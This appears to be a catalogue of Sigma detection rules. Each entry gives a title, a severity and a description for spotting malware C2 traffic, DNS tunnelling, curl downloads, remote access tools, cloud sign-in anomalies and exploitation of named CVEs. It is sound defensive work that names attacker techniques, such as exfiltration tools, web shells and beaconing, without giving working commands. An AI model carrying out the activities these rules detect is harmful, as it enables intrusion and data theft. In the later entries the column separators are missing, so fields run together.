Chafer Malware URL Pattern | high | Detects HTTP requests used by Chafer malware to receive data from its C2.
Ursnif Malware C2 URL Pattern | critical | Detects Ursnif C2 traffic.
Ursnif Malware Download URL Pattern | high | Detects download of Ursnif malware done by dropper documents.
APT40 Dropbox Tool User Agent | high | Detects the suspicious user agent string of the APT40 Dropbox tool.
ComRAT Network Communication | high | Detects Turla ComRAT network communication.
GALLIUM IOCs | high | Detects artifacts associated with the GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
GALLIUM Artefacts - Builtin | high | Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Greenbug Espionage Group Indicators | critical | Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec.
Devil Bait Potential C2 Communication Traffic | high | Detects potential C2 communication related to Devil Bait malware.
Goofy Guineapig Backdoor Potential C2 Communication | high | Detects potential C2 communication related to the Goofy Guineapig backdoor.
Small Sieve Malware Potential C2 Communication | critical | Detects potential C2 communication related to Small Sieve malware.
Potential CVE-2023-36884 Exploitation Pattern | critical | Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884.
Potential CVE-2023-36884 URL Request Pattern Traffic | high | Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884.
Potential CVE-2023-36884 Exploitation - File Downloads | medium | Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884.
Potential CVE-2023-36884 Exploitation - URL Marker | high | Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884.
Potential CVE-2023-36884 Exploitation - Share Access | high | Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884.
Potential SocGholish Second Stage C2 DNS Query | high | Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic.
DarkGate - Autoit3.EXE File Creation By Uncommon Process | medium | Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.
Potential Pikabot C2 Activity | high | Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2 communication through hard-coded Windows binaries.
Potential Compromised 3CXDesktopApp Beaconing Activity - DNS | high | Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise.
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon | high | Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise.
Potential Suspicious Child Process Of 3CXDesktopApp | high | Detects potential suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise.
Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy | high | Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise.
Potential Compromised 3CXDesktopApp ICO C2 File Download | high | Detects potential malicious .ICO file downloads from a compromised 3CXDesktopApp via web requests to the malicious Github repository.
Diamond Sleet APT DNS Communication Indicators | high | Detects DNS queries related to Diamond Sleet APT activity.
Potential Operation Triangulation C2 Beaconing Activity - DNS | high | Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB.
Potential Operation Triangulation C2 Beaconing Activity - Proxy | high | Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB.
Potential Peach Sandstorm APT C2 Communication Activity | medium | Detects potential C2 communication activity related to Peach Sandstorm APT.
Potential CSharp Streamer RAT Loading .NET Executable Image | high | Detects potential CSharp Streamer RAT loading a .NET executable image by using the default file name and path associated with the tool.
DPRK Threat Actor - C2 Communication DNS Indicators | high | Detects DNS queries for C2 domains used by DPRK threat actors.
VsCode Code Tunnel Execution File Indicator | medium | Detects the creation of a file with the name "code_tunnel.json" which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.
Network Connection Initiated From Users\Public Folder | medium | Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environment.
File Download Via Curl.EXE | medium | Detects file download using curl.exe.
Curl.EXE Execution | low | Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server.
Curl.EXE Execution With Custom UserAgent | medium | Detects execution of curl.exe with custom user agent options.
Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions | medium | Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of Action1, the administrator must create a new policy or an app to establish remote execution and then point it at the endpoints where the agent is installed. Hunting Opportunity 1 - Weed Out The Noise: When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command to extract the policy name, group all the policy names, and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours: If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
Tunneling Tool Execution | medium | Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
Possible DNS Tunneling | high | Normally, DNS logs contain a limited amount of different DNS queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
High NULL Records Requests Rate | medium | Extremely high rate of NULL record type DNS requests from a host per short period of time. Possible result of iodine tool execution.
High DNS Requests Rate | medium | High DNS request volume from a host per short period of time.
High TXT Records Requests Rate | medium | Extremely high rate of TXT record type DNS requests from a host per short period of time. Possible result of Do-exfiltration tool execution.
High DNS Requests Rate - Firewall | medium | High DNS request volume from a host per short period of time.
Possible DNS Rebinding | medium | Detects DNS answers with TTL < 10.
DNSCat2 Powershell Implementation Detection Via Process Creation | high | The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
Suspicious Werfault.exe Network Connection Outbound | medium | Adversaries can migrate Cobalt Strike/Metasploit/C2 beacons on compromised systems to the legitimate werfault.exe process to avoid detection.
attack.initial_access 253
Title | Level | Description
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd | high | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
User Added To Admin Group - MacOS | medium | Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Search-ms and WebDAV Suspicious Indicators in URL | high | Detects URL patterns used by search(-ms)/WebDAV initial access campaigns.
Django Framework Exceptions | medium | Detects suspicious Django web application framework exceptions that could indicate exploitation attempts.
Potential JNDI Injection Exploitation In JVM Based Application | high | Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.
Potential Local File Read Vulnerability In JVM Based Application | high | Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused by user input and contain path traversal payloads then it's a red flag.
Potential OGNL Injection Exploitation In JVM Based Application | high | Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134).
Process Execution Error In JVM Based Application | high | Detects process execution related exceptions in JVM based apps, often related to RCE.
Potential XXE Exploitation Attempt In JVM Based Application | high | Detects XML parsing issues; if the application expects to work with XML, make sure that the parser is initialized safely.
Potential RCE Exploitation Attempt In NodeJS | high | Detects process execution related errors in NodeJS. If the exceptions are caused by user input then they may suggest an RCE vulnerability.
OpenCanary - FTP Login Attempt | high | Detects instances where an FTP service on an OpenCanary node has had a login attempt.
OpenCanary - HTTPPROXY Login Attempt | high | Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
OpenCanary - HTTP GET Request | high | Detects instances where an HTTP service on an OpenCanary node has received a GET request.
OpenCanary - HTTP POST Login Attempt | high | Detects instances where an HTTP service on an OpenCanary node has had a login attempt via Form POST.
OpenCanary - SSH Login Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
OpenCanary - Telnet Login Attempt | high | Detects instances where a Telnet service on an OpenCanary node has had a login attempt.
Python SQL Exceptions | medium | Generic rule for SQL exceptions in Python according to PEP 249.
Ruby on Rails Framework Exceptions | medium | Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts.
Spring Framework Exceptions | medium | Detects suspicious Spring framework exceptions that could indicate exploitation attempts.
Potential SpEL Injection In Spring Framework | high | Detects potential SpEL Injection exploitation, which may lead to RCE.
Suspicious SQL Error Messages | high | Detects SQL error messages that indicate probing for an injection attack.
Potential Server Side Template Injection In Velocity | high | Detects exceptions in the Velocity template renderer; this most likely happens due to dynamic rendering of user input and may lead to RCE.
Suspicious SQL Query | medium | Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields.
New Network ACL Entry Added | low | Detects that network ACL entries have been added to a route table, which could indicate that new attack vectors have been opened up in the AWS account.
New Network Route Added | medium | Detects the addition of a new network route to a route table in AWS.
Ingress/Egress Security Group Modification | medium | Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
LoadBalancer Security Group Modification | medium | Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
RDS Database Security Group Modification | medium | Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet or a wider audience within the VPC, or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.
AWS Key Pair Import Activity | medium | Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
New AWS Lambda Function URL Configuration Created | medium | Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
AWS Suspicious SAML Activity | medium | Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
Azure Subscription Permission Elevation Via ActivityLogs | high | Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
Guest Users Invited To Tenant By Non Approved Inviters | medium | Detects guest users being invited to the tenant by non-approved inviters.
Azure Domain Federation Settings Modified | medium | Identifies when a user or application modified the federation settings on the domain.
User State Changed From Guest To Member | medium | Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.
Azure Subscription Permission Elevation Via AuditLogs | high | Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
Activity From Anonymous IP Address | high | Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical Travel | high | Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible Travel | high | Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser Activity | high | Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser.
Azure AD Threat Intelligence | high | Indicates user activity that is unusual for the user or consistent with known attack patterns.
New Country | high | Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In Properties | high | Detects sign-ins with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Successful Authentications From Countries You Do Not Operate Out Of | medium | Detects successful authentications from countries you do not operate out of.
Authentications To Important Apps Using Single Factor Authentication | medium | Detects when authentications to important application(s) only required single-factor authentication.
Failed Authentications From Countries You Do Not Operate Out Of | low | Detects failed authentications from countries you do not operate out of.
Azure AD Only Single Factor Authentication Required | low | Detects when users are authenticating without MFA being required.
Potential MFA Bypass Using Legacy Client Authentication | high | Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
Application Using Device Code Authentication Flow | medium | Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication Flow | medium | Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Account Disabled or Blocked for Sign in Attempts | medium | Detects when an account is disabled or blocked for sign in but tried to log in.
Sign-in Failure Due to Conditional Access Requirements Not Met | high | Define a baseline threshold for failed sign-ins due to Conditional Access failures.
Use of Legacy Authentication Protocols | high | Alert on when legacy authentication has been used on an account.
Login to Disabled Account | medium | Detects failed attempts to sign in to disabled accounts.
Multifactor Authentication Denied | medium | The user has indicated they haven't instigated the MFA prompt, which could indicate an attacker has the password for the account.
Azure Unusual Authentication Interruption | medium | Detects when there is an interruption in the authentication process.
Multifactor Authentication Interrupted | medium | Identifies user logins with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
Users Authenticating To Other Azure AD Tenants | medium | Detects when users in your Azure AD tenant are authenticating to other Azure AD Tenants.
User Access Blocked by Azure Conditional Access | medium | Detects when access has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.
Cisco Duo Successful MFA Authentication Via Bypass Code | medium | Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
Outdated Dependency Or Vulnerability Alert Disabled | high | Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories.
Github New Secret Created | low | Detects when a user creates an action secret for the organization, environment, codespaces or repository.
Github Self Hosted Runner Changes Detected | low | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, self-hosted runner configuration changes should be validated from the GitHub UI because the log entry may not provide full context.
Microsoft 365 - Impossible Travel Activity | medium | Detects when Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with impossible travel.
Logon from a Risky IP Address | medium | Detects when Microsoft Cloud App Security reported that a user signed into your sanctioned apps from a risky IP address.
Microsoft 365 - User Restricted from Sending Email | medium | Detects when the Security Compliance Center reported a user who exceeded the sending limits of the service policies and because of this has been restricted from sending email.
Okta FastPass Phishing Detection | high | Detects when Okta FastPass prevents a known phishing site.
Okta New Admin Console Behaviours | high | Detects when Okta identifies new activity in the Admin Console.
Default Credentials Usage | medium | Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.
Suspicious OpenSSH Daemon Error | medium | Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts.
Suspicious Named Error | high | Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts.
Suspicious VSFTPD Error Messages | medium | Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts.
Atlassian Confluence CVE-2022-26134 | high | Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134.
Apache Spark Shell Command Injection - ProcessCreation | high | Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command line perspective.
OMIGOD SCX RunAsProvider ExecuteScript | high | Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed gets created as a temp file in the /tmp folder with a scx* prefix. Then it is invoked from the following directory: /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommand | high | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Remote Access Tool - Team Viewer Session Started On Linux Host | low | Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
User Added To Admin Group Via Dscl | medium | Detects attempts to create and add an account to the admin group via "dscl".
User Added To Admin Group Via DseditGroup | medium | Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Root Account Enable Via Dsenableroot | medium | Detects attempts to enable the root account via "dsenableroot".
Disk Image Mounting Via Hdiutil - MacOS | medium | Detects the execution of the hdiutil utility in order to mount disk images.
Remote Access Tool - Team Viewer Session Started On MacOS Host | low | Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Suspicious Browser Child Process - MacOS | medium | Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
Suspicious Execution via macOS Script Editor | medium | Detects when the macOS Script Editor utility spawns an unusual child process.
User Added To Admin Group Via Sysadminctl | medium | Detects attempts to create and add an account to the admin group via "sysadminctl".
Guest Account Enabled Via Sysadminctl | low | Detects attempts to enable the guest account using the sysadminctl utility.
Cisco BGP Authentication Failures | low | Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
Cisco LDP Authentication Failures | low | Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels.
DNS Query to External Service Interaction Domains | high | Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE.
Huawei BGP Authentication Failures | low | Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5 | low | Detects Juniper BGP missing MD5 digest, which may be indicative of brute force attacks to manipulate routing.
OMIGOD HTTP No Authentication RCE | high | Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) of commands as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Apache Threading Error | medium | Detects an issue in Apache logs that reports threading related errors.
Download From Suspicious TLD - Blacklist | low | Detects download of certain file types from hosts in suspicious TLDs.
Download From Suspicious TLD - Whitelist | low | Detects executable downloads from suspicious remote systems.
F5 BIG-IP iControl Rest API Command Execution - Proxy | medium | Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP.
Flash Player Update from Suspicious Location | high | Detects a Flash Player update from an unofficial location.
Hack Tool User Agent | high | Detects suspicious user agent strings used by hack tools in proxy logs.
Suspicious External WebDAV Execution | high | Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
Successful IIS Shortname Fuzzing Scan | medium | When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~".
Java Payload Strings | high | Detects possible Java payloads in web access logs.
JNDIExploit Pattern | high | Detects exploitation attempts using the JNDI-Exploit-Kit.
Path Traversal Exploitation Attempts | medium | Detects path traversal exploitation attempts.
SQL Injection Strings In URIhighDetects potential SQL injection attempts via GET requests in access logs.
Suspicious User-Agents Related To Recon ToolsmediumDetects known suspicious (default) user-agents related to scanning/recon tools
Cross Site Scripting StringshighDetects XSS attempts injected via GET requests in access logs
USB Device PluggedlowDetects plugged/unplugged USB devices
Device Installation BlockedmediumDetects an installation of a device that is forbidden by the system policy
External Disk Drive Or USB Storage Device Was Recognized By The SystemlowDetects external disk drives or plugged-in USB devices.
ISO Image MountedmediumDetects the mount of an ISO image on an endpoint
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Password Protected ZIP File Opened (Email Attachment)highDetects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
External Remote RDP Logon from Public IPmediumDetects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
External Remote SMB Logon from Public IPhighDetects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
Failed Logon From Public IPmediumDetects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
DNS Query Request By QuickAssist.EXElowDetects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
Unusual File Modification by dns.exehighDetects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Unusual File Deletion by Dns.exehighDetects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Suspicious File Drop by ExchangemediumDetects suspicious file type dropped by an Exchange component in IIS
Potential Initial Access via DLL Search Order HijackingmediumDetects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
ISO File Created Within Temp FoldershighDetects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
ISO or Image Mount Indicator in Recent FilesmediumDetects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
Office Macro File CreationlowDetects the creation of a new office macro files on the systems
Office Macro File DownloadmediumDetects the creation of a new office macro files on the systems via an application (browser, mail client).
Office Macro File Creation From Suspicious ProcesshighDetects the creation of a office macro file from a a suspicious process
Suspicious MSExchangeMailboxReplication ASPX WritehighDetects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
Suspicious Computer Machine Password by PowerShellmediumThe Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.
Unusual Child Process of dns.exehighDetects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
HTML Help HH.EXE Suspicious Child ProcesshighDetects a suspicious child process of a Microsoft HTML Help (HH.exe)
Suspicious HH.EXE ExecutionhighDetects a suspicious execution of a Microsoft HTML Help (HH.exe)
Suspicious HWP Sub ProcesseshighDetects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Suspicious Shells Spawn by Java Utility KeytoolhighDetects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Suspicious Processes Spawned by Java.EXEhighDetects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXEmediumDetects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Suspicious Child Process Of SQL ServerhighDetects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam DabatasecriticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
Suspicious Microsoft OneNote Child ProcesshighDetects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
Suspicious Execution From Outlook Temporary FolderhighDetects a suspicious program execution in Outlook temp folder
Remote Access Tool - AnyDesk Execution With Known Revoked Signing CertificatemediumDetects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
Remote Access Tool - ScreenConnect Installation ExecutionmediumDetects ScreenConnect program starts that establish a remote access to a system.
Remote Access Tool - ScreenConnect Server Web Shell ExecutionhighDetects potential web shell execution from the ScreenConnect server process.
Remote Access Tool - Team Viewer Session Started On Windows HostlowDetects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Arbitrary Shell Command Execution Via Settingcontent-MsmediumThe .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Phishing Pattern ISO in ArchivehighDetects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
Suspicious Double Extension File ExecutioncriticalDetects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
Terminal Service Process SpawnhighDetects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Suspicious Processes Spawned by WinRMhighDetects suspicious processes including shells spawnd from WinRM host process
Windows Registry Trust Record ModificationmediumAlerts on trust record modification within the registry, indicating usage of macros
Rejetto HTTP File Server RCEhighDetects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
CVE-2010-5278 Exploitation AttemptcriticalMODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
Exploit for CVE-2017-0261mediumDetects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Droppers Exploiting CVE-2017-11882criticalDetects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Exploit for CVE-2017-8759criticalDetects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
Fortinet CVE-2018-13379 ExploitationcriticalDetects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
Oracle WebLogic ExploitcriticalDetects access to a webshell dropped into a keystore folder on the WebLogic server
Pulse Secure Attack CVE-2019-11510criticalDetects CVE-2019-11510 exploitation attempt - URI contains Guacamole
Citrix Netscaler Attack CVE-2019-19781criticalDetects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
Confluence Exploitation CVE-2019-3398criticalDetects the exploitation of the Confluence vulnerability described in CVE-2019-3398
Ursnif Malware C2 URL PatterncriticalDetects Ursnif C2 traffic.
CVE-2020-0688 Exploitation AttempthighDetects CVE-2020-0688 Exploitation attempts
CVE-2020-0688 Exchange Exploitation via Web LogcriticalDetects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
CVE-2020-0688 Exploitation via EventloghighDetects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
CVE-2020-10148 SolarWinds Orion API Auth BypasscriticalDetects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
DNS RCE CVE-2020-1350criticalDetects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
CVE-2020-5902 F5 BIG-IP Exploitation AttemptcriticalDetects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195criticalDetects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
Exploited CVE-2020-10189 Zoho ManageEnginehighDetects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
TerraMaster TOS CVE-2020-28188highDetects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
Cisco ASA FTD Exploit CVE-2020-3452highDetects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)
Oracle WebLogic Exploit CVE-2020-14882highDetects exploitation attempts on WebLogic servers
Arcadyan Router ExploitationscriticalDetects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
Oracle WebLogic Exploit CVE-2021-2109criticalDetects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
CVE-2021-21972 VSphere ExploitationhighDetects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
CVE-2021-21978 Exploitation AttempthighDetects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
VMware vCenter Server File Upload CVE-2021-22005highDetects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
Fortinet CVE-2021-22123 ExploitationcriticalDetects CVE-2021-22123 exploitation attempt against Fortinet WAFs
Pulse Connect Secure RCE Attack CVE-2021-22893highThis rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
Potential Atlassian Confluence CVE-2021-26084 Exploitation AttempthighDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
